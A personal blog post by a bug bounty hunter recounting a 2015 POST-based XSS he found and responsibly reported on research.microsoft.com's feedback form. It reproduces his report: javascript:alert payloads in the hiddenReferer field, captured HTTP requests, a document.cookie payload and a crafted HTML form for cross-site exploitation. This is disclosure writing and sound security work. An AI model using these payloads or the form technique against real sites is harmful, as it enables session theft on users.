Post XSS At : "research.microsoft.com"

Hii
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).

NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in  my story Do Ignore.

Link : https://technet.microsoft.com/en-in/security/cc308589.aspx


I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...

so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.

So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(

Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"

Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.


After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link :  http://corp.wamba.com/en/developer/security/?fame

So, Finally I got a start...
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.

NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049

After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...

As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/en-us/"

Now, testing Begin's...

On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "


And I Failed....:(

Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.

NOTE : Exactly The Same Report :


Vulnerable Domain :
--------------------------------

http://research.microsoft.com/

Vulnerable Link :
---------------------------

http://research.microsoft.com/apps/mobile/feedback.aspx

Vulnerable Parameter :
-------------------------------------

hiddenReferer=

XSS Payload :
---------------------

javascript:alert(123456789)
javascript:alert(document.
domain)
javascript:alert("XSS____
ALERT_____!!!!_____:_____Hacked___By___Raghav")
Steps To Reproduce :
------------------------------
-
1. Go to vulnerable Link : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Put data in form  and click on submit meanwhile add proxy & intercept HTTP Request.
Then,
Find Vulnerable parameter : hiddenReferer=
&
Put XSS Payload : javascript:alert(123456789)
3. Forward The Request...

Original Request :
--------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=
22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093;

A=I&I=
AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D;

_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1;

km_ai=
FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;

WT_FPC=id=
220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=;

omniID=1445758143494_c04d_
29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-
urlencoded
Content-Length: 452

__VIEWSTATE=%
2FwEPDwUJLTgzMTg5OTc5ZGShzpE5tzmEw6CKkKDvGHntFLidc5imff8w7mu2zy%2FLMQ%3D

%3D&__VIEWSTATEGENERATOR=
716BEBFC&__EVENTVALIDATION=

%
2FwEdAARKJNO6sKLVvRzw7zztCu4VtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8s

%2Fz5WZ7D4I2h2W9EhPlJLX2gF%
2BinlORjyb3MDfBMo%2F9Y%3D&ctl00%24bodyPlaceholder

%24hiddenReferer=&Content=1&
Design=2&Usability=3&Overall=4&ctl00%24bodyPlaceholder

%24commentTxt=asadas&ctl00%
24bodyPlaceholder%24submitBtn=Submit

Edited Request :
-------------------------

POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/apps/mobile/feedback.aspx
Cookie: MC1=GUID=
22a3cdbfa8d5904b942b60e36305e4eb&HASH=bfcd&LV=201508&V=4&LU=1441034037093;

A=I&I=
AxUFAAAAAAAeCQAApxclCNxGFk+1KDeEOKYm2A!!&V=4; MUID=3CE4D5FFCA896F5712EFDDF4CB966E2D;

_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
22a3cdbfa8d5904b942b60e36305e4eb&CS=3&LV=201509&V=1;

km_ai=
FA8dlGEvWq66GJiPA83Nhvzj9mY%3D; km_uq=; km_lv=x; R=200234933-9/14/2015 12:18:26;

WT_FPC=id=
220af3c63b6e33379221442103020970:lv=1446427090307:ss=1446427090307; WT_NVR_RU=0=technet:1=:2=;

omniID=1445758143494_c04d_
29d1_3dca_05f32aa0d277; MC0=1446534979732; MS0=64028a0f7e8a4846ac5da7cca81d6ddc
Connection: keep-alive
Content-Type: application/x-www-form-
urlencoded
Content-Length: 470

__VIEWSTATE=%
2FwEPDwUJLTgzMTg5OTc5ZGTXCl2373301Rpe5vIISbXvtNenkjedT%2Bw1VGl4ldsRqw%3D

%3D&__VIEWSTATEGENERATOR=
716BEBFC&__EVENTVALIDATION=

%
2FwEdAAR2zlRPRPhJi19IJ5naZBSPtMM203w3pCXVfEXN8x4O0jpn2Pr6XjNySqjv2083yVfNgUlRChClrK8AcSkpyD8sBCl6HiMzA

gi%
2F4d3G3Luo2MkPYCKPbIHIh3MWPVPWxGM%3D&ctl00%24bodyPlaceholder%24hiddenReferer=javascript:alert

(123456789)&Content=1&Design=
2&Usability=3&Overall=4&ctl00%24bodyPlaceholder

%24commentTxt=m&ctl00%
24bodyPlaceholder%24submitBtn=Submit

Response :
------------------

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
NOTE : POC Attached...!!!



And I Failed Again....:(

Now as we all know every story have 3 Sections The Start, The Mid & The "Twist".

As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,

1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.

2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.

 

SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...

Respected...
As per POC for my earlier mail...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html]
Steps To Reproduce For POST XSS Exploitation :
------------------------------------------------------------------------------


1. Save the vulnerable Page in local system : http://research.microsoft.com/apps/mobile/feedback.aspx
2. Edit source code and add :

</p><form name="aspnetForm" method="post" action="http://research.microsoft.com/apps/mobile/feedback.aspx" id="aspnetForm">

<input name="ctl00$bodyPlaceholder$hiddenReferer" id="ctl00_bodyPlaceholder_
hiddenReferer" type="hidden" value="javascript:alert(document.cookie)">

3. Run in page in Local system & click on submit.
4. When form is successfully submitted Click on  "Hyperlinked : Click" To Execute XSS Payload.
Conclusions :
---------------------

1. Attacker can host the page and ask for feedback's.
2. Missing of "X-Frame-Options: sameorigin " Header in Response can give advantage to attacker for XFS Attack [Source : https://www.owasp.org/index.php/Cross_Frame_Scripting] [ POC Screenshot Attached : XFS-Microsoft.png ]
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!


Video POC : https://www.youtube.com/watch?v=uokq33ssLdc

So Finally On November 17th 2015 I got the confirmation of Bug Fixed...




Thank You....!!!!



- Raghav Bisht

Comments

  1. Flawless effort and superb write up. Enjoyed reading it as if it was all tethering live !!! I have less or no knowledge about the field you expertise in but you have a good sense of writing skill and being an avid blogger for the last "God knows how many ****** years" - You ROCK !!! Good Luck.

    ReplyDelete
  2. Good Work Man.... All the best :) (y)

    ReplyDelete
  3. great job man great write up u have on ur blog ur pocs have opened my eye to so many things keep up the good work just wanted to ask what book or videos would u recommend for someone looking to start up in bug hunting industry

    ReplyDelete
    Replies
    1. Web-application hacker handbook Vol-1,2
      Grey hat hacking handbook series

      Delete
  4. Freeware downloads of total variation pocket pc video games tend to be the most effective functions in your hands pilot.Robinson, durante la gran depresi?n en Innovative Orleans.I find this infuriating coping with one particular desktop.

    ReplyDelete

Post a Comment

Popular posts from this blog

Blind OOB XXE At UBER 26+ Domains Hacked.

That Moment When You Find Authentication Bypass Vulnerability In Bug Bounty Program ?